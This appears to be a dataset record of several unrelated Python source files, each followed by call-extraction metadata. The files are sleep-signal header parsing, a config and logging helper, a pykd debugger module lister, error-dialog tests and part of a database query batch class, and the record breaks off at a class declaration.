            raise HeaderFieldTypeError(f"Field {field} of type {type_} was not expected, expected one of {valid_types}")
    if header['length'] <= 0:
        raise LengthZeroSignalError(f"Expected key 'length' to be a non-zero integer, "
                                    f"but header {header} has value {header['length']}")
    # Warn on duplicate channels
    from psg_utils.io.channels.utils import check_duplicate_channels
    check_duplicate_channels(header['channel_names'], raise_or_warn="warn")
    return header
def _sample_rate_as_int(sample_rate, raise_or_warn='warn'):
"""
Returns the sample rate rounded to the nearest whole integer.
If the integer sample rate is not exactly (as determined by np.isclose) equal to the original,
possibly floating, value an warning is issued if raise_or_warn="warn" or an FloatSampleRateError
is raised if raise_or_warn="raise".
Raises ValueError if raise_or_warn not in ('raise', 'warn', 'warning').
Args:
sample_rate: int, float sample rate
Returns:
sample_rate, int
"""
new_sample_rate = int(np.round(sample_rate))
if not np.isclose(new_sample_rate, sample_rate):
s = f"The loaded file has a float sample rate of value {sample_rate} which is not exactly equal to the " \
f"rounded integer value of {new_sample_rate}. Please note: Integer value {new_sample_rate} will be used."
if raise_or_warn.lower() == "raise":
raise FloatSampleRateWarning(s)
elif raise_or_warn.lower() in ("warn", "warning"):
warnings.warn(s, FloatSampleRateWarning)
else:
raise ValueError("raise_or_warn argument must be one of 'raise' or 'warn'.")
return new_sample_rate
def _standardized_edf_header(raw_edf, channel_names_overwrite=None):
    """
    Header extraction function for RawEDF and Raw objects.
    Reads the number of channels, channel names and sample rate properties.
    If existing, reads the date information as well.

    channel_names_overwrite allows passing a list of channel names to use instead of
    those loaded by MNE per default. This is useful e.g. to set the raw EDF names in the
    header instead of the truncated / renamed (on duplicates) used by MNE.

    Returns:
        Header information as dict
    """
    # Each tuple below follows the format:
    # 1) output name, 2) edf_obj name, 3) function to apply to the read
    # value, 4) whether a missing value should raise an error.
    header_map = [("n_channels", "nchan", int, True),
                  ("channel_names", "ch_names", list, True),
                  ("sample_rate", "sfreq", _sample_rate_as_int, True),
                  ("date", "meas_date", datetime.utcfromtimestamp, False)]
    # Older MNE stores meas_date as a (timestamp, microseconds) pair.
    if isinstance(raw_edf.info["meas_date"], (tuple, list)):
        assert raw_edf.info["meas_date"][1] == 0
        raw_edf.info["meas_date"] = raw_edf.info["meas_date"][0]
    header = {}
    for renamed, org, transform, raise_err in header_map:
        value = raw_edf.info.get(org)
        try:
            value = transform(value)
        except Exception as e:
            if raise_err:
                raise HeaderFieldTypeError("Missing or invalid value in EDF file for key {} "
                                           "- got {}".format(org, value)) from e
        # Note: for optional fields the raw (possibly untransformed) value is kept.
        header[renamed] = value
    header["length"] = len(raw_edf)
    # Bug fix: the original did ``list(channel_names_overwrite) or header[...]``,
    # which raises TypeError when channel_names_overwrite is None (the default).
    # A falsy overwrite (None or empty) keeps the MNE-loaded names, as before.
    if channel_names_overwrite:
        header["channel_names"] = list(channel_names_overwrite)
    return _assert_header(header)
def _standardized_wfdb_header(wfdb_record):
    """
    Header extraction function for WFDB Record objects.

    Reads the number of channels, channel names and sample rate properties.
    If existing, reads the date information as well.

    Returns:
        Header information as dict
    """
    # Mapping of: output key -> (record attribute, cast/transform, required?)
    field_specs = (("n_channels", "n_sig", int, True),
                   ("channel_names", "sig_name", list, True),
                   ("sample_rate", "fs", _sample_rate_as_int, True),
                   ("date", "base_date", datetime.utcfromtimestamp, False),
                   ("length", "sig_len", int, True))
    header = {}
    for out_key, attr_name, cast, required in field_specs:
        raw_value = getattr(wfdb_record, attr_name, None)
        try:
            raw_value = cast(raw_value)
        except Exception as err:
            # Optional fields keep their (possibly None) raw value on failure.
            if required:
                raise HeaderFieldTypeError("Missing or invalid value in WFDB file for key {} "
                                           "- got {}".format(attr_name, raw_value)) from err
        header[out_key] = raw_value
    return _assert_header(header)
def _traverse_h5_file(root_node, attributes=None):
    """Recursively walk an h5 node, collecting effective attributes per dataset.

    Attributes set on a node are inherited by all deeper nodes unless a deeper
    node overrides them with its own attribute of the same name.
    """
    # Copy so attributes set on deeper nodes never leak back to siblings.
    inherited = dict(attributes or {})
    inherited.update(root_node.attrs)
    if isinstance(root_node, h5py.Dataset):
        # Leaf node: record its effective attributes plus its length.
        inherited["length"] = len(root_node)
        return {root_node.name: inherited}
    collected = {}
    for child_key in root_node:
        collected.update(_traverse_h5_file(root_node[child_key], inherited))
    return collected
def _get_unique_value(items):
"""
Takes a list of items, checks that all are equal (in value, ==) and returns the unique value.
Returns None if the list is empty.
Raises ValueError if not all items are not equal.
Args:
items: List
Returns:
The unique item in list
"""
if len(items) == 0:
return None
for item in items[1:]:
if item != items[0]:
raise H5VariableAttributesError(f"The input list '{items}' contains more than 1 unique value")
return items[0]
def _standardized_h5_header(h5_file, channel_group_name="channels"):
    """
    Header extraction function for h5py.File objects.
    The object must:
      - Have an attribute 'sample_rate'
      - Have a group named {channel_group_name} which stores the data for all channels as
        Dataset entries under the group (can be nested in deeper groups too)
    Can have:
      - An attribute 'date' which gives a date string or unix timestamp integer
    Currently raises an error if any attribute in ('date', 'sample_rate', 'length') are not equal among all
    datasets in the archive.
    All attributes may be set at any node, and will affect any non-attributed node deeper in the tree.
    E.g. setting the 'sample_rate' attribute on the root note will have it affect all datasets, unless
    the attribute is set on deeper nodes too in which case the later will overwrite the root attribute for
    all its nested, un-attributed children.
    Returns:
        Header information as dict
    """
    # Traverse the h5 archive for datasets and assigned attributes.
    # h5_content maps full dataset path -> effective (inherited) attributes.
    h5_content = _traverse_h5_file(h5_file[channel_group_name], attributes=h5_file.attrs)
    header = {
        "channel_names": [],
        "channel_paths": {},  # will store channel_name: channel path entries
        "sample_rate": [],
        "date": [],
        "length": []
    }
    # Collect per-dataset values; uniqueness across datasets is enforced below.
    for channel_path, attributes in h5_content.items():
        # The channel name is the last component of the dataset path.
        channel_name = channel_path.split("/")[-1]
        header["channel_paths"][channel_name] = channel_path
        header["channel_names"].append(channel_name)
        header["sample_rate"].append(attributes.get("sample_rate"))
        header["date"].append(attributes.get("date"))
        header["length"].append(attributes.get("length"))
    header["n_channels"] = len(h5_content)
    # Ensure all dates, lengths and sample rate attributes are equal
    # TODO: Remove this restriction at least for sample rates; requires handling at PSG loading time
    try:
        header["date"] = _get_unique_value(header["date"])
        header["sample_rate"] = _sample_rate_as_int(_get_unique_value(header["sample_rate"]))
        header["length"] = int(_get_unique_value(header["length"]))
    except H5VariableAttributesError as e:
        raise H5VariableAttributesError("Datasets stored in the specified H5 archive differ with respect to one or "
                                        "multiple of the following attributes: 'date', 'sampling_rate', 'length'. "
                                        "All datasets must currently match with respect to those attributes.") from e
    # Get datetime date or set to None.
    # Integers (including numpy integer scalars) are treated as unix timestamps;
    # anything that is neither an int-like timestamp nor already a datetime is dropped.
    date = header["date"]
    if not isinstance(date, str) and (isinstance(date, int) or np.issubdtype(date, np.integer)):
        date = datetime.utcfromtimestamp(date)
    elif not isinstance(date, datetime):
        date = None
    header["date"] = date
    return _assert_header(header)
def _standardized_bin_header(raw_header):
    """
    Header extraction function for custom dict type headers for data in .bin files.

    Raw header has structure:
    {"CHX": [list of channel inds], "NAME": [list of channel names],
     "TYPE": [list of channel types], "FS": [list of channel sample rates]}
    All values stored in the header are strings and should be cast to ints. etc as appropriate
    for header standardization.
    Currently raises an error if all attribute in header["FS"] are not equal
    (i.e., same sample rate is required for all channels).

    Returns:
        Header information as dict

    Raises:
        VariableSampleRateError: If the per-channel sample rates are not all equal.
    """
    # Assert upper case keys
    raw_header = {key.upper(): values for key, values in raw_header.items()}
    # Order header entries according to CHX column.
    # Bug fix: 'np.int' was a deprecated alias removed in NumPy 1.24; the
    # builtin int is the documented replacement and behaves identically here.
    order = np.argsort(np.array(raw_header['CHX'], dtype=int))
    raw_header = {key: ([entry[i] for i in order]
                        if isinstance(entry, (list, tuple, np.ndarray))
                        else entry)
                  for key, entry in raw_header.items()}
    # Assert that all samples rates are equal
    sample_rates = np.array(raw_header["FS"], dtype=np.int32)
    if not (sample_rates[0] == sample_rates).all():
        raise VariableSampleRateError(f"Sample rates in header {raw_header} are not "
                                      f"all equal with rates: {sample_rates}. "
                                      f"The data loaders for .bin formatted files currently "
                                      f"support only files with all channels sampled at equal rates.")
    # Build standardized header
    header = {
        "n_channels": len(raw_header["NAME"]),
        "channel_names": list(raw_header["NAME"]),
        "sample_rate": _sample_rate_as_int(sample_rates[0]),
        "date": None,
        "length": int(raw_header["LENGTH"]),
        "channel_types": [type_.upper() for type_ in raw_header.get("TYPE", [])]
    }
    return _assert_header(header)
| [
"logging.getLogger",
"datetime.datetime.utcfromtimestamp",
"psg_utils.errors.VariableSampleRateError",
"numpy.isclose",
"psg_utils.io.channels.utils.check_duplicate_channels",
"numpy.array",
"psg_utils.errors.HeaderFieldTypeError",
"numpy.issubdtype",
"psg_utils.errors.FloatSampleRateWarning",
"wa... | [((821, 848), 'logging.getLogger', 'logging.getLogger', (['__name__'], {}), '(__name__)\n', (838, 848), False, 'import logging\n'), ((2174, 2245), 'psg_utils.io.channels.utils.check_duplicate_channels', 'check_duplicate_channels', (["header['channel_names']"], {'raise_or_warn': '"""warn"""'}), "(header['channel_names'], raise_or_warn='warn')\n", (2198, 2245), False, 'from psg_utils.io.channels.utils import check_duplicate_channels\n'), ((11568, 11610), 'numpy.array', 'np.array', (["raw_header['FS']"], {'dtype': 'np.int32'}), "(raw_header['FS'], dtype=np.int32)\n", (11576, 11610), True, 'import numpy as np\n'), ((1905, 2037), 'psg_utils.errors.LengthZeroSignalError', 'LengthZeroSignalError', (['f"""Expected key \'length\' to be a non-zero integer, but header {header} has value {header[\'length\']}"""'], {}), '(\n f"Expected key \'length\' to be a non-zero integer, but header {header} has value {header[\'length\']}"\n )\n', (1926, 2037), False, 'from psg_utils.errors import MissingHeaderFieldError, HeaderFieldTypeError, LengthZeroSignalError, H5VariableAttributesError, VariableSampleRateError, FloatSampleRateWarning\n'), ((2845, 2866), 'numpy.round', 'np.round', (['sample_rate'], {}), '(sample_rate)\n', (2853, 2866), True, 'import numpy as np\n'), ((2879, 2919), 'numpy.isclose', 'np.isclose', (['new_sample_rate', 'sample_rate'], {}), '(new_sample_rate, sample_rate)\n', (2889, 2919), True, 'import numpy as np\n'), ((10270, 10301), 'datetime.datetime.utcfromtimestamp', 'datetime.utcfromtimestamp', (['date'], {}), '(date)\n', (10295, 10301), False, 'from datetime import datetime\n'), ((11245, 11286), 'numpy.array', 'np.array', (["raw_header['CHX']"], {'dtype': 'np.int'}), "(raw_header['CHX'], dtype=np.int)\n", (11253, 11286), True, 'import numpy as np\n'), ((11677, 11909), 'psg_utils.errors.VariableSampleRateError', 'VariableSampleRateError', (['f"""Sample rates in header {raw_header} are not all equal with rates: {sample_rates}. 
The data loaders for .bin formatted files currently support only files with all channels sampled at equal rates."""'], {}), "(\n f'Sample rates in header {raw_header} are not all equal with rates: {sample_rates}. The data loaders for .bin formatted files currently support only files with all channels sampled at equal rates.'\n )\n", (11700, 11909), False, 'from psg_utils.errors import MissingHeaderFieldError, HeaderFieldTypeError, LengthZeroSignalError, H5VariableAttributesError, VariableSampleRateError, FloatSampleRateWarning\n'), ((1415, 1586), 'psg_utils.errors.MissingHeaderFieldError', 'MissingHeaderFieldError', (['f"""Missing value \'{field}\' from header \'{header}\'. This could be an error in the code implementation. Please raise this issue on GitHub."""'], {}), '(\n f"Missing value \'{field}\' from header \'{header}\'. This could be an error in the code implementation. Please raise this issue on GitHub."\n )\n', (1438, 1586), False, 'from psg_utils.errors import MissingHeaderFieldError, HeaderFieldTypeError, LengthZeroSignalError, H5VariableAttributesError, VariableSampleRateError, FloatSampleRateWarning\n'), ((1758, 1870), 'psg_utils.errors.HeaderFieldTypeError', 'HeaderFieldTypeError', (['f"""Field {field} of type {type_} was not expected, expected one of {valid_types}"""'], {}), "(\n f'Field {field} of type {type_} was not expected, expected one of {valid_types}'\n )\n", (1778, 1870), False, 'from psg_utils.errors import MissingHeaderFieldError, HeaderFieldTypeError, LengthZeroSignalError, H5VariableAttributesError, VariableSampleRateError, FloatSampleRateWarning\n'), ((3217, 3242), 'psg_utils.errors.FloatSampleRateWarning', 'FloatSampleRateWarning', (['s'], {}), '(s)\n', (3239, 3242), False, 'from psg_utils.errors import MissingHeaderFieldError, HeaderFieldTypeError, LengthZeroSignalError, H5VariableAttributesError, VariableSampleRateError, FloatSampleRateWarning\n'), ((7383, 7476), 'psg_utils.errors.H5VariableAttributesError', 
'H5VariableAttributesError', (['f"""The input list \'{items}\' contains more than 1 unique value"""'], {}), '(\n f"The input list \'{items}\' contains more than 1 unique value")\n', (7408, 7476), False, 'from psg_utils.errors import MissingHeaderFieldError, HeaderFieldTypeError, LengthZeroSignalError, H5VariableAttributesError, VariableSampleRateError, FloatSampleRateWarning\n'), ((9755, 10008), 'psg_utils.errors.H5VariableAttributesError', 'H5VariableAttributesError', (['"""Datasets stored in the specified H5 archive differ with respect to one or multiple of the following attributes: \'date\', \'sampling_rate\', \'length\'. All datasets must currently match with respect to those attributes."""'], {}), '(\n "Datasets stored in the specified H5 archive differ with respect to one or multiple of the following attributes: \'date\', \'sampling_rate\', \'length\'. All datasets must currently match with respect to those attributes."\n )\n', (9780, 10008), False, 'from psg_utils.errors import MissingHeaderFieldError, HeaderFieldTypeError, LengthZeroSignalError, H5VariableAttributesError, VariableSampleRateError, FloatSampleRateWarning\n'), ((10221, 10252), 'numpy.issubdtype', 'np.issubdtype', (['date', 'np.integer'], {}), '(date, np.integer)\n', (10234, 10252), True, 'import numpy as np\n'), ((3314, 3354), 'warnings.warn', 'warnings.warn', (['s', 'FloatSampleRateWarning'], {}), '(s, FloatSampleRateWarning)\n', (3327, 3354), False, 'import warnings\n')] |
import sys,os
import json
import logging as log
import socket
from collections import OrderedDict
import datetime
from platform import system as system_name # Returns the system/OS name
from subprocess import call as system_call # Execute a shell command
def ping(host):
    """
    Returns True if host (str) responds to a ping request.

    Remember that a host may not respond to a ping (ICMP) request even if the
    host name is valid.
    """
    # Windows spells the packet-count flag '-n'; every other OS uses '-c'.
    count_flag = '-c'
    if system_name().lower() == 'windows':
        count_flag = '-n'
    # Building the command. Ex: "ping -c 1 google.com"
    cmd = ['ping', count_flag, '1', host]
    # Exit status 0 means at least one reply was received.
    return system_call(cmd) == 0
# -------------------- config --------------------
def get_local_json():
    """Fetch the config.json file in the local directory.

    If a host-specific config_<hostname>.json is found it is used over the
    default config.json.

    Returns:
        The parsed configuration dict, or None if no config file exists.
    """
    config = None
    dirname = os.path.dirname(sys.argv[0])
    if len(dirname) == 0:
        dirname = "."
    config_file = dirname + '/' + "config_" + socket.gethostname() + ".json"
    if os.path.isfile(config_file):
        print("loading: ", config_file)
        with open(config_file) as fh:
            config = json.load(fh)
    else:
        config_file = dirname + '/' + "config.json"
        if os.path.isfile(config_file):
            # Bug fix: the old call 'print("loading: %s",config_file)' printed
            # the literal '%s' instead of substituting the file name.
            print("loading: %s" % config_file)
            with open(config_file) as fh:
                config = json.load(fh)
        else:
            print("Fatal error 'config.json' not found")
    return config
# -------------------- config --------------------
def get_local_nodes(nodes_file):
    """Load node definitions from a JSON file, preserving entry order.

    Args:
        nodes_file: Path to a JSON file describing the nodes.

    Returns:
        OrderedDict with the nodes in the order they appear in the file.
    """
    # Bug fix: the previous bare open() leaked the file handle; a context
    # manager closes it deterministically.
    with open(nodes_file) as nodes_handle:
        return json.load(nodes_handle, object_pairs_hook=OrderedDict)
def configure_log(logger_name):
    """Configure root logging from the local JSON config and return that config.

    Reads the 'log' section of the local configuration, resets any previously
    installed root handlers, then installs a file handler (via basicConfig)
    plus a console StreamHandler.
    """
    global_config = get_local_json()
    log_config = global_config["log"]
    # Textual level names from the config mapped to stdlib numeric levels.
    level_by_name = {
        "Debug": 10,
        "Info": 20,
        "Warning": 30,
        "Error": 40,
        "Critical": 50
    }
    # Remove handlers left over from earlier basicConfig() calls so that
    # reconfiguration actually takes effect.
    for existing_handler in log.root.handlers[:]:
        log.root.removeHandler(existing_handler)
    log.basicConfig(filename=log_config["logfile"],
                    level=level_by_name[log_config["level"]],
                    format='%(asctime)s %(name)s %(levelname)-8s %(message)s',
                    datefmt='%d %H:%M:%S')
    # Echo log records to the console as well as the file.
    log.getLogger('').addHandler(log.StreamHandler())
    log.info("====> '%s' started logging with level '%s' @ '%s'" % (logger_name, log_config["level"], str(datetime.datetime.utcnow())))
    return global_config
| [
"logging.basicConfig",
"logging.getLogger",
"logging.StreamHandler",
"datetime.datetime.utcnow",
"os.path.isfile",
"os.path.dirname",
"platform.system",
"subprocess.call",
"logging.root.removeHandler",
"socket.gethostname"
] | [((961, 989), 'os.path.dirname', 'os.path.dirname', (['sys.argv[0]'], {}), '(sys.argv[0])\n', (976, 989), False, 'import sys, os\n'), ((1115, 1142), 'os.path.isfile', 'os.path.isfile', (['config_file'], {}), '(config_file)\n', (1129, 1142), False, 'import sys, os\n'), ((2071, 2243), 'logging.basicConfig', 'log.basicConfig', ([], {'filename': "config['logfile']", 'level': "log_level_map[config['level']]", 'format': '"""%(asctime)s %(name)s %(levelname)-8s %(message)s"""', 'datefmt': '"""%d %H:%M:%S"""'}), "(filename=config['logfile'], level=log_level_map[config[\n 'level']], format='%(asctime)s %(name)s %(levelname)-8s %(message)s',\n datefmt='%d %H:%M:%S')\n", (2086, 2243), True, 'import logging as log\n'), ((689, 709), 'subprocess.call', 'system_call', (['command'], {}), '(command)\n', (700, 709), True, 'from subprocess import call as system_call\n'), ((1299, 1326), 'os.path.isfile', 'os.path.isfile', (['config_file'], {}), '(config_file)\n', (1313, 1326), False, 'import sys, os\n'), ((2035, 2066), 'logging.root.removeHandler', 'log.root.removeHandler', (['handler'], {}), '(handler)\n', (2057, 2066), True, 'import logging as log\n'), ((2369, 2388), 'logging.StreamHandler', 'log.StreamHandler', ([], {}), '()\n', (2386, 2388), True, 'import logging as log\n'), ((1079, 1099), 'socket.gethostname', 'socket.gethostname', ([], {}), '()\n', (1097, 1099), False, 'import socket\n'), ((2340, 2357), 'logging.getLogger', 'log.getLogger', (['""""""'], {}), "('')\n", (2353, 2357), True, 'import logging as log\n'), ((523, 536), 'platform.system', 'system_name', ([], {}), '()\n', (534, 536), True, 'from platform import system as system_name\n'), ((2488, 2514), 'datetime.datetime.utcnow', 'datetime.datetime.utcnow', ([], {}), '()\n', (2512, 2514), False, 'import datetime\n')] |
#
# Modules Info
#
import pykd
moduleList = []
def reloadModules():
    """Rebuild the global module cache from the debugger's loaded-module list.

    Clears the globals created by a previous call, walks the loader list
    (kernel PsLoadedModuleList when kernel debugging, otherwise the user-mode
    PEB Ldr list) and re-exposes each module as a lowercase global variable.
    """
    global moduleList
    # Drop the globals installed by the previous call before repopulating.
    for m in moduleList: globals()[ m.name().lower() ] = None
    if pykd.isKernelDebugging():
        global nt
        nt = pykd.loadModule("nt")
        # Walk the kernel loader list anchored at nt!PsLoadedModuleList.
        modules = pykd.typedVarList( nt.PsLoadedModuleList, "nt", "_LDR_DATA_TABLE_ENTRY", "InLoadOrderLinks" )
        # NOTE(review): this append is discarded by the 'moduleList = []'
        # reset below; 'nt' stays reachable only via the global — confirm
        # whether nt was meant to be kept in moduleList.
        moduleList.append( nt )
    else:
        ntdll = pykd.loadModule("ntdll")
        # Resolve the current process PEB and follow its loader data.
        peb = pykd.typedVar( "ntdll", "_PEB", pykd.getCurrentProcess() )
        ldr = pykd.typedVar( "ntdll", "_PEB_LDR_DATA", peb.Ldr )
        modules = pykd.typedVarList( ldr.InLoadOrderModuleList.getAddress(), "ntdll", "_LDR_DATA_TABLE_ENTRY", "InLoadOrderLinks" )
    moduleList = []
    for m in modules:
        baseName = str( pykd.loadUnicodeString( m.BaseDllName.getAddress() ) )
        # The kernel image itself is handled via the 'nt' global above.
        if baseName=="ntoskrnl.exe":
            continue
        module = pykd.findModule( m.DllBase )
        # Expose each module as a lowercase global, e.g. 'kernel32'.
        globals()[ module.name().lower() ] = module
        moduleList.append( module )
def printModuleList():
    """Print every cached module, one per line, to the debugger output."""
    rendered = [str(module) for module in moduleList]
    pykd.dprintln("\n".join(rendered))
# Populate the module cache (and the per-module globals) on import.
reloadModules()
| [
"pykd.typedVarList",
"pykd.loadModule",
"pykd.typedVar",
"pykd.getCurrentProcess",
"pykd.findModule",
"pykd.isKernelDebugging"
] | [((202, 226), 'pykd.isKernelDebugging', 'pykd.isKernelDebugging', ([], {}), '()\n', (224, 226), False, 'import pykd\n'), ((266, 287), 'pykd.loadModule', 'pykd.loadModule', (['"""nt"""'], {}), "('nt')\n", (281, 287), False, 'import pykd\n'), ((309, 404), 'pykd.typedVarList', 'pykd.typedVarList', (['nt.PsLoadedModuleList', '"""nt"""', '"""_LDR_DATA_TABLE_ENTRY"""', '"""InLoadOrderLinks"""'], {}), "(nt.PsLoadedModuleList, 'nt', '_LDR_DATA_TABLE_ENTRY',\n 'InLoadOrderLinks')\n", (326, 404), False, 'import pykd\n'), ((478, 502), 'pykd.loadModule', 'pykd.loadModule', (['"""ntdll"""'], {}), "('ntdll')\n", (493, 502), False, 'import pykd\n'), ((596, 644), 'pykd.typedVar', 'pykd.typedVar', (['"""ntdll"""', '"""_PEB_LDR_DATA"""', 'peb.Ldr'], {}), "('ntdll', '_PEB_LDR_DATA', peb.Ldr)\n", (609, 644), False, 'import pykd\n'), ((999, 1025), 'pykd.findModule', 'pykd.findModule', (['m.DllBase'], {}), '(m.DllBase)\n', (1014, 1025), False, 'import pykd\n'), ((552, 576), 'pykd.getCurrentProcess', 'pykd.getCurrentProcess', ([], {}), '()\n', (574, 576), False, 'import pykd\n')] |
"""Test module for the Error dialog widget."""
import os
import logging
import pytest
from PySide2.QtGui import QClipboard
from src.widgets import error_dialog
from src.about import about_to_string
@pytest.fixture()
def error_log_path(_package):
    """Yield the path to the errors.log file inside the package log folder."""
    log_dir = os.path.join(_package, 'src', 'log')
    yield os.path.join(log_dir, 'errors.log')
@pytest.fixture(name='report')
def create_report(qtbot, error_log_path):
    """Initialize the ErrorDialog widget and yield an error report.

    On teardown the errors.log file is truncated so later tests start clean.

    Yields:
        Report: a namedtuple with the link and the port attributes.
    """
    dialog = error_dialog.ErrorDialog('Test Error')
    qtbot.addWidget(dialog)
    yield dialog.prepare_report()
    # Teardown: truncate the error log file.
    open(error_log_path, 'w').close()
def test_report_return_value(report):
    """Check that prepare_report yields a tuple-like report object."""
    report_is_tuple = isinstance(report, tuple)
    assert report_is_tuple
def test_prepare_report_link(report):
    """The Report button should point at the project's GitHub issues page."""
    expected_link = 'https://github.com/sisoe24/NukeServerSocket/issues'
    assert report.link == expected_link
def test_prepare_report_clipboard(report):
    """Preparing a report should place its text into the system clipboard."""
    clipboard_text = QClipboard().text()
    assert 'NukeServerSocket' in clipboard_text
def test_prepare_report_file(report, error_log_path):
    """The report file should embed the 'about' information string."""
    with open(error_log_path) as log_file:
        contents = log_file.read()
    assert about_to_string() in contents
def test_get_critical_logger():
    """_get_critical_logger should return the 'Critical' file handler."""
    handler = error_dialog._get_critical_logger()
    assert handler.name == 'Critical'
    assert isinstance(handler, logging.FileHandler)
| [
"src.widgets.error_dialog.ErrorDialog",
"src.widgets.error_dialog._get_critical_logger",
"os.path.join",
"PySide2.QtGui.QClipboard",
"pytest.fixture",
"src.about.about_to_string"
] | [((204, 220), 'pytest.fixture', 'pytest.fixture', ([], {}), '()\n', (218, 220), False, 'import pytest\n'), ((353, 382), 'pytest.fixture', 'pytest.fixture', ([], {'name': '"""report"""'}), "(name='report')\n", (367, 382), False, 'import pytest\n'), ((645, 683), 'src.widgets.error_dialog.ErrorDialog', 'error_dialog.ErrorDialog', (['"""Test Error"""'], {}), "('Test Error')\n", (669, 683), False, 'from src.widgets import error_dialog\n'), ((1611, 1646), 'src.widgets.error_dialog._get_critical_logger', 'error_dialog._get_critical_logger', ([], {}), '()\n', (1644, 1646), False, 'from src.widgets import error_dialog\n'), ((299, 349), 'os.path.join', 'os.path.join', (['_package', '"""src"""', '"""log"""', '"""errors.log"""'], {}), "(_package, 'src', 'log', 'errors.log')\n", (311, 349), False, 'import os\n'), ((1463, 1480), 'src.about.about_to_string', 'about_to_string', ([], {}), '()\n', (1478, 1480), False, 'from src.about import about_to_string\n'), ((1261, 1273), 'PySide2.QtGui.QClipboard', 'QClipboard', ([], {}), '()\n', (1271, 1273), False, 'from PySide2.QtGui import QClipboard\n')] |
# --------------------------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# --------------------------------------------------------------------------------------------
from enum import Enum
from typing import List # noqa
from datetime import datetime
import uuid
import sqlparse
from ossdbtoolsservice.driver import ServerConnection
from ossdbtoolsservice.utils.time import get_time_str, get_elapsed_time_str
from ossdbtoolsservice.query.contracts import BatchSummary, SaveResultsRequestParams, SelectionData
from ossdbtoolsservice.query.result_set import ResultSet # noqa
from ossdbtoolsservice.query.file_storage_result_set import FileStorageResultSet
from ossdbtoolsservice.query.in_memory_result_set import InMemoryResultSet
from ossdbtoolsservice.query.data_storage import FileStreamFactory
from ossdbtoolsservice.utils.constants import PG_PROVIDER_NAME
class ResultSetStorageType(Enum):
    """Where a query result set is materialized."""
    # Bug fix: a trailing comma previously made IN_MEMORY's value the tuple
    # (1,) instead of the int 1, inconsistent with FILE_STORAGE = 2.
    IN_MEMORY = 1
    FILE_STORAGE = 2
class BatchEvents:
    """Groups the optional callbacks invoked while a batch executes.

    Each callback may be None, in which case the corresponding event is ignored.
    """

    def __init__(self, on_execution_started=None, on_execution_completed=None, on_result_set_completed=None):
        # Stash each callback (or None) on a privately named attribute.
        self._on_execution_started = on_execution_started
        self._on_result_set_completed = on_result_set_completed
        self._on_execution_completed = on_execution_completed
class SelectBatchEvents(BatchEvents):
    """BatchEvents extended with a hook fired after the first fetch of rows."""

    def __init__(self, on_execution_started, on_execution_completed, on_result_set_completed, on_after_first_fetch):
        super().__init__(on_execution_started, on_execution_completed, on_result_set_completed)
        self._on_after_first_fetch = on_after_first_fetch
class Batch:
    """A single executable statement within a query.

    Tracks execution timing, error state, server notices and the produced
    result set, and fires the optional BatchEvents callbacks around execution.
    """
    def __init__(
            self,
            batch_text: str,
            ordinal: int,
            selection: SelectionData,
            batch_events: BatchEvents = None,
            storage_type: ResultSetStorageType = ResultSetStorageType.FILE_STORAGE
    ) -> None:
        """
        :param batch_text: SQL text of this batch
        :param ordinal: Position of the batch within its parent query; used as the batch id
        :param selection: Location of the batch text within the source document
        :param batch_events: Optional callbacks fired on execution start/completion
        :param storage_type: Backing storage for the result set (file or memory)
        """
        self.id = ordinal
        self.selection = selection
        self.batch_text = batch_text
        self._execution_start_time: datetime = None
        self._has_error = False
        self._has_executed = False
        self._execution_end_time: datetime = None
        self._result_set: ResultSet = None
        self._notices: List[str] = []
        self._batch_events = batch_events
        self._storage_type = storage_type
    @property
    def batch_summary(self) -> BatchSummary:
        """Contract summary of this batch for the JSON-RPC layer."""
        return BatchSummary.from_batch(self)
    @property
    def has_error(self) -> bool:
        """Whether the last execution raised a database error."""
        return self._has_error
    @property
    def has_executed(self) -> bool:
        """Whether execute() has completed (successfully or not)."""
        return self._has_executed
    @property
    def start_date_str(self) -> str:
        """ISO-formatted execution start time, or None if never executed."""
        if self._execution_start_time is None:
            return None
        return self._execution_start_time.isoformat()
    @property
    def start_time(self) -> str:
        """Human-readable execution start time."""
        return get_time_str(self._execution_start_time)
    @property
    def end_time(self) -> str:
        """Human-readable execution end time."""
        return get_time_str(self._execution_end_time)
    @property
    def elapsed_time(self) -> str:
        """Human-readable duration between execution start and end."""
        return get_elapsed_time_str(self._execution_start_time, self._execution_end_time)
    @property
    def result_set(self) -> ResultSet:
        """The result set produced by the last execution, or None."""
        return self._result_set
    @property
    def row_count(self) -> int:
        """Number of rows in the result set, or -1 when there is none."""
        return self.result_set.row_count if self.result_set is not None else -1
    @property
    def notices(self) -> List[str]:
        """Server notices collected during the last execution."""
        return self._notices
    def get_cursor(self, connection: ServerConnection):
        """Return a plain client-side cursor; SelectBatch overrides this."""
        return connection.cursor()
    def execute(self, conn: ServerConnection) -> None:
        """
        Execute the batch using a cursor retrieved from the given connection
        :raises DatabaseError: if an error is encountered while running the batch's query
        """
        self._execution_start_time = datetime.now()
        if self._batch_events and self._batch_events._on_execution_started:
            self._batch_events._on_execution_started(self)
        cursor = self.get_cursor(conn)
        try:
            cursor.execute(self.batch_text)
            # Commit the transaction if autocommit is True
            if conn.autocommit:
                conn.commit()
            self.after_execute(cursor)
        except conn.database_error as error:
            self._has_error = True
            raise error
        finally:
            # We are doing this because when the execute fails for named cursors
            # cursor is not activated on the server which results in failure on close
            # Hence we are checking if the cursor was really executed for us to close it
            if cursor and cursor.rowcount != -1 and cursor.rowcount is not None:
                cursor.close()
            self._has_executed = True
            self._execution_end_time = datetime.now()
            # TODO: PyMySQL doesn't support notices from a connection
            if conn._provider_name == PG_PROVIDER_NAME:
                # Capture and clear accumulated server notices for this batch.
                self._notices = cursor.connection.notices
                cursor.connection.notices = []
            if self._batch_events and self._batch_events._on_execution_completed:
                self._batch_events._on_execution_completed(self)
    def after_execute(self, cursor) -> None:
        """Build a result set when the statement returned rows (has a description)."""
        if cursor.description is not None:
            self.create_result_set(cursor)
    def create_result_set(self, cursor):
        """Read the cursor to exhaustion into a new result set (index 0)."""
        result_set = create_result_set(self._storage_type, 0, self.id)
        result_set.read_result_to_end(cursor)
        self._result_set = result_set
    def get_subset(self, start_index: int, end_index: int):
        """Return the rows [start_index, end_index) from the stored result set."""
        return self._result_set.get_subset(start_index, end_index)
    def save_as(self, params: SaveResultsRequestParams, file_factory: FileStreamFactory, on_success, on_failure) -> None:
        """Save the (single) result set to a file using the given stream factory."""
        if params.result_set_index != 0:
            raise IndexError('Result set index should be always 0')
        self._result_set.save_as(params, file_factory, on_success, on_failure)
class SelectBatch(Batch):
